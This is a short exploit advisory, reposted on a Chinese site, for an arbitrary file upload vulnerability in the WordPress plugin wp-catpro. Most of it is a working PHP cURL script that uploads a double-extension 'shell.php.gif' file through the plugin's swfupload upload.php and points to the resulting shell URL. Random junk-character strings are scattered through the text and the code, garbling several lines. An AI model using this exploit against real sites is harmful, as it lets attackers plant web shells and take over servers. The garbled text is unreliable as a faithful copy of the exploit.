WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
! j9 v8 r! @7 ^; v9 I# {+ p' h
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
/ K& o1 K; T8 k4 H' U0 \. s下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
: ^; Y" T9 E5 H% u+ b6 g# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
) D& F* \# R3 Q$ c( N% M- |. P# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
* h" H& m* d/ ^% m. V# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
- f- z7 @! M$ f7 ^7 X4 _9 d% b
8 g* L7 l2 ^( x) W9 H0 x0 J$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
$ n' p  ?7 K# T7 D, l9 t0 ['folder'=>'/wp-content/uploads/catpro/'));
2 Q; `; ~" ?9 X5 A+ @( Ucurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
% l9 s* S) K4 Ocurl_close($ch);
4 D% Z; q" L3 q  E+ F: Q+ o( d
) N/ V4 V9 T' A7 P9 h& V) Iprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
6 I$ L# V% y4 K/ X  ?>
7 r3 ?6 {! h1 O& b) k) Z  [<?php
phpinfo();
?>